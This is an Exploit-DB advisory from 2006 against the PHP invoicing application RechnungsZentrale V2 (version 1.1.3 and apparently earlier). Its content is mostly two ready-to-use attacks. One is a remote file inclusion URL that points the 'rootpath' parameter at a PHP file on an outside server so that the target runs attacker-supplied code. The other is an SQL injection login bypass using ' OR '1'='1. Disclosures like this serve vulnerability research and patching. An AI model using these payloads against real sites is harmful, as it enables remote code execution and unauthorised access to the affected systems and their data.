RechnungsZentrale V2 <= 1.1.3 - Remote Inclusion Vulnerability

2006-04-19T00:00:00
ID EDB-ID:1699
Type exploitdb
Reporter GroundZero Security
Modified 2006-04-19T00:00:00

Description

RechnungsZentrale V2. Webapps exploit for php platform

                                        
                                            - GroundZero Security Research and Software Development 2006                     -

   Software:   RechnungsZentrale V2
   Version:    1.1.3, likely older versions are affected aswell.
   Vendor:     http://www.nfec.de/
   
   Remote Inclusion:
       http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4
   
   SQL Injection:
       User: ' OR '1'='1
       Password: 1   
   
- Bugs discovered by GroundZero Security Research and Software Development       -
- http://www.GroundZero-Security.com | Http://www.g-0.org                        -

# milw0rm.com [2006-04-19]